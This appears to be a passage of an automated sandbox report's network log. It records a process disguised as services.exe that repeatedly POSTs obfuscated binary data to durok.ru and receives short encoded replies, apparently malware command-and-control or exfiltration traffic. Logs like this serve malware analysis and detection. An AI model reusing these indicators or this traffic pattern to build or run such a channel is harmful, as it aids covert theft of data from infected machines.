                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AYlGfDBkS3tjmeWbmGQwSgrFScv%2BNlc8tcQmqLwnRMUSPMIU6Qh7ahIU3kdHvIhHf6zjFxZAxJDk00E%2Fb58N%2FFwv5X1RfmRPLEvjh3xI2FHznWi6TtlsN3EBOw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f8262b13be80f8b-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=4067&min_rtt=1595&rtt_var=5544&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2435&delivery_rate=68294&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 39 38 0d 0a 0f 11 24 13 3d 07 09 56 23 2c 20 13 3c 13 08 19 3d 31 29 5c 3c 32 2e 06 3c 2f 00 1f 2b 16 0d 52 23 3a 2e 5c 3e 14 24 13 26 25 26 5b 25 21 2e 5c 05 1d 24 07 3f 02 30 10 27 32 36 07 2a 3e 2a 46 2a 58 22 02 30 2f 05 5b 20 2b 22 17 20 1f 01 05 2e 2c 20 5e 2e 2c 20 12 3c 30 2e 5a 36 07 21 51 0c 1f 38 56 21 29 2b 12 27 2e 2a 0a 36 1e 34 0d 32 2b 31 0d 35 05 0d 57 27 14 23 11 25 23 3b 56 37 3d 30 0a 28 5b 3d 07 25 11 36 04 29 29 25 5e 2d 02 23 54 03 3e 54 56 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 98$=V#, <=1)\<2.</+R#:.\>$&%&[%!.\$?0'26*>*F*X"0/[ +" ., ^., <0.Z6!Q8V!)+'.*642+15W'#%#;V7=0([=%6))%^-#T>TV0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              58192.168.2.449831104.21.93.162802308C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 26, 2024 17:18:12.715503931 CET307OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:18:13.071080923 CET2548OUTData Raw: 5c 59 5b 5b 54 58 59 56 5e 58 52 54 56 5e 58 55 54 55 5b 5e 56 5e 53 59 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: \Y[[TXYV^XRTV^XUTU[^V^SYPZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT$_(20>9Q"!';1=0';X",8#>-:7>3$="Z.#Z*
                                                                                                                              Dec 26, 2024 17:18:13.894951105 CET25INHTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:18:14.145729065 CET799INHTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:18:13 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JIkkwSFF%2F%2Fryk5JMKvMvib0sJBZ032KcHItVXUNyf0rk2U9LrdGE6Hk4lcprNM6%2BGGidK1JVcAZ7PrPFTYNdcgUg%2BYplOkfv2g81aR0pSmTMa3CKuYi585TYFA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f8262b3cf7b43f7-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=8614&min_rtt=1759&rtt_var=14370&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2855&delivery_rate=25794&cwnd=212&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              59192.168.2.449832104.21.93.162802308C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 26, 2024 17:18:14.388128042 CET307OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:18:14.739933968 CET2548OUTData Raw: 59 51 5e 51 54 59 59 55 5e 58 52 54 56 5c 58 52 54 5d 5b 5b 56 5f 53 54 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: YQ^QTYYU^XRTV\XRT][[V_STPZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT'(,+*5V""?;9V>$[04#Y"<$P#X-(A<0+5"Z.#Z*2


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              60192.168.2.449834104.21.93.162802308C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 26, 2024 17:18:14.861882925 CET331OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2128
                                                                                                                              Expect: 100-continue
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Dec 26, 2024 17:18:15.209330082 CET2128OUTData Raw: 59 5c 5e 5b 51 5c 5c 56 5e 58 52 54 56 5b 58 55 54 56 5b 5a 56 51 53 55 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: Y\^[Q\\V^XRTV[XUTV[ZVQSUPZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT$_( <=#2'8X-='.Y'?Z7?#4Z99'<3<="Z.#Z*.
                                                                                                                              Dec 26, 2024 17:18:16.047468901 CET25INHTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:18:16.305658102 CET952INHTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:18:16 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bpHXPoFwudJgRnE86G43vs3pHcMPqffMNj%2F11ws%2F74d4ogYf%2FiE%2BmVtLLYv7lfVZvCSctjrVroHoIHTHuqqcRvu%2BWJ%2Fc9ggFc6hFpE2fpmlZHloptfvPye8cpQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f8262c14f614310-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=3171&min_rtt=1727&rtt_var=3536&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2459&delivery_rate=109923&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 39 38 0d 0a 0f 11 27 00 3d 2a 24 0a 22 3c 2c 56 2b 03 31 09 2a 57 3e 01 2b 21 39 1a 28 3c 22 56 2a 38 2b 53 37 04 04 11 29 14 28 5d 32 08 08 5c 26 21 2e 5c 05 1d 27 17 3e 3b 05 02 33 0c 0c 07 3e 00 07 1b 29 10 17 18 24 01 0e 04 34 3b 0c 5a 34 57 2b 04 2c 05 23 03 2e 2c 20 5f 28 23 32 11 22 17 21 51 0c 1f 3b 0e 21 29 27 5e 26 3d 25 1f 21 33 37 54 25 38 2e 1f 21 15 2f 1e 27 2a 27 5a 25 0d 0d 52 37 2d 3f 10 3f 3d 39 00 25 59 22 04 29 13 25 5e 2d 02 23 54 03 3e 54 56 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 98'=*$"<,V+1*W>+!9(<"V*8+S7)(]2\&!.\'>;3>)$4;Z4W+,#., _(#2"!Q;!)'^&=%!37T%8.!/'*'Z%R7-??=9%Y")%^-#T>TV0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              61192.168.2.449839104.21.93.162802308C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 26, 2024 17:18:14.986026049 CET331OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Dec 26, 2024 17:18:15.333659887 CET2548OUTData Raw: 5c 5b 5b 58 54 59 5c 55 5e 58 52 54 56 5f 58 55 54 53 5b 54 56 51 53 5d 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: \[[XTY\U^XRTV_XUTS[TVQS]PZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT$)" [<>#!(;>?4%$4043"<1,*<(/+%"Z.#Z*>
                                                                                                                              Dec 26, 2024 17:18:16.162266970 CET25INHTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:18:16.413836002 CET807INHTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:18:16 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bM0D5hOXlA%2BbgL2ciaS5vbkPZzrZBNy6AHJndfXqvUAwfx7%2BYSIMWGhOHAauW9fLipx3NgJs2lA%2B%2B%2F4UOJVOxhZ9jPi8hpA9%2FOKe2UaO97wIjS%2FM3xIQQ%2F01rg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f8262c1fb4642e7-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=8165&min_rtt=1530&rtt_var=13845&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2879&delivery_rate=26732&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              62192.168.2.449840104.21.93.162802308C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 26, 2024 17:18:16.711566925 CET307OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:18:17.067986012 CET2548OUTData Raw: 59 50 5b 5f 54 59 5c 57 5e 58 52 54 56 5c 58 52 54 56 5b 5c 56 5e 53 54 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: YP[_TY\W^XRTV\XRTV[\V^STPZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT'?>)&6$8>5W='>0$ ,<P <&.*<D?08>"Z.#Z*2


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              63192.168.2.449846104.21.93.162802308C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 26, 2024 17:18:17.454895020 CET331OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2108
                                                                                                                              Expect: 100-continue
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Dec 26, 2024 17:18:17.802299023 CET2108OUTData Raw: 5c 5e 5e 51 54 5b 59 5b 5e 58 52 54 56 50 58 5a 54 54 5b 5f 56 56 53 5e 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: \^^QT[Y[^XRTVPXZTT[_VVS^PZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT'(!4]?*#2<8!Q=$:'Y#87/&.:$A+ ,>"Z.#Z*
                                                                                                                              Dec 26, 2024 17:18:18.634217978 CET25INHTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:18:18.905492067 CET949INHTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:18:18 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=D9sbMCttX4UvbNvL5FlJRhGJgF6B1RoED2NVzf4s%2BxbfZu277Q5Vp9YLfeVM7v%2FNlzE5kXcC7X9AQBjchKMl%2B4amtunHryV%2Bkxjuz3%2F9vVlt1qWNPAVEzDVJHQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f8262d16c2f8c39-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=4241&min_rtt=1889&rtt_var=5414&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2439&delivery_rate=70490&cwnd=189&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 39 38 0d 0a 0f 11 24 11 3d 39 2c 0e 23 2c 23 0c 2a 3e 21 0b 2a 22 21 14 28 32 21 5f 3c 3f 08 53 2a 38 30 0f 23 3a 25 02 28 3a 24 5a 31 0f 2e 10 26 31 2e 5c 05 1d 24 07 3f 5d 3b 02 27 54 36 02 3d 00 26 0b 3d 3d 3a 04 27 2c 2b 5b 20 05 04 5f 37 21 06 59 2f 12 2c 5a 39 2c 02 59 3c 56 32 5c 36 07 21 51 0c 1f 38 55 21 5f 33 1c 26 00 26 0a 22 20 19 1d 25 01 32 55 23 2b 3f 13 30 04 33 13 25 23 02 0b 22 3d 01 1e 2a 3d 00 59 25 3c 3a 00 3e 39 25 5e 2d 02 23 54 03 3e 54 56 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 98$=9,#,#*>!*"!(2!_<?S*80#:%(:$Z1.&1.\$?];'T6=&==:',+[ _7!Y/,Z9,Y<V2\6!Q8U!_3&&" %2U#+?03%#"=*=Y%<:>9%^-#T>TV0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              64192.168.2.449847104.21.93.162802308C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 26, 2024 17:18:17.578418970 CET331OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Dec 26, 2024 17:18:17.927375078 CET2548OUTData Raw: 5c 5e 5e 58 51 59 5c 56 5e 58 52 54 56 51 58 52 54 50 5b 5c 56 52 53 5b 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: \^^XQY\V^XRTVQXRTP[\VRS[PZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT'(1 ]<_662,/-6?4>Z3", ",.: ? /*%"Z.#Z*
                                                                                                                              Dec 26, 2024 17:18:18.756412029 CET25INHTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:18:19.009543896 CET801INHTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:18:18 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MDmD%2BCMXyj3ROpUm29j3ahy2aYvNbwwkhlGZHe4nxnQ0EGHSSKfhjAFaB7Qs5k3AOUNGp2tPUexWP%2Bh3CPLlOnHVWQetF3Cse9CAk%2FiY%2FlN9%2BXehXZX6ZfBWxQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f8262d23826f5f4-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=8257&min_rtt=1656&rtt_var=13824&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2879&delivery_rate=26803&cwnd=102&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              65192.168.2.449848104.21.93.162802308C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 26, 2024 17:18:19.749393940 CET307OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              66192.168.2.449854104.21.93.162802308C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 26, 2024 17:18:20.095247984 CET331OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2092
                                                                                                                              Expect: 100-continue
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Dec 26, 2024 17:18:20.443094015 CET2092OUTData Raw: 5c 5b 5b 5b 51 5c 59 51 5e 58 52 54 56 59 58 54 54 50 5b 54 56 50 53 5b 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: \[[[Q\YQ^XRTVYXTTP[TVPS[PZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT$^+(:!W"!7;:>$)' ",8#,_:\$C+ ^="Z.#Z*
                                                                                                                              Dec 26, 2024 17:18:21.275500059 CET25INHTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:18:21.529951096 CET949INHTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:18:21 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=axMs%2BToI8WB8f1oaD%2BT4TxavsZUFEMtsIGNTVgRMA%2BXO43ij0fgq9Y6Z6B2fD2Bp2qqn%2FiZU1bhQGuNqvQgacfxui92uAuNIFsSmAcqqUcNioG4%2B0ws00Po05Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f8262e1eeb87cee-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=4127&min_rtt=1845&rtt_var=5256&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2423&delivery_rate=72625&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 39 38 0d 0a 0f 11 24 5c 3d 39 24 0f 37 3c 30 54 3c 5b 25 0f 3e 31 3d 5c 3f 0b 2e 07 2b 3c 22 54 2a 28 2c 0a 37 03 25 01 28 3a 0a 13 25 50 39 05 25 21 2e 5c 05 1d 24 05 2b 3b 05 06 30 54 32 03 3d 00 0c 41 28 2e 21 5f 33 01 28 04 23 05 2d 07 34 31 2f 03 3b 2f 2b 02 2e 02 2b 07 2b 20 3e 5c 36 07 21 51 0c 1f 38 53 36 2a 2f 59 27 2d 36 0e 20 23 3b 1c 32 28 2e 53 22 15 06 08 33 3a 01 5c 32 0a 37 54 34 3d 09 1d 3f 03 26 10 32 3c 3d 1f 3d 39 25 5e 2d 02 23 54 03 3e 54 56 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 98$\=9$7<0T<[%>1=\?.+<"T*(,7%(:%P9%!.\$+;0T2=A(.!_3(#-41/;/+.++ >\6!Q8S6*/Y'-6 #;2(.S"3:\27T4=?&2<==9%^-#T>TV0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              67192.168.2.449855104.21.93.162802308C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 26, 2024 17:18:20.234801054 CET331OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Dec 26, 2024 17:18:20.583687067 CET2548OUTData Raw: 59 58 5e 58 54 59 5c 56 5e 58 52 54 56 5d 58 50 54 5c 5b 5a 56 50 53 5d 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
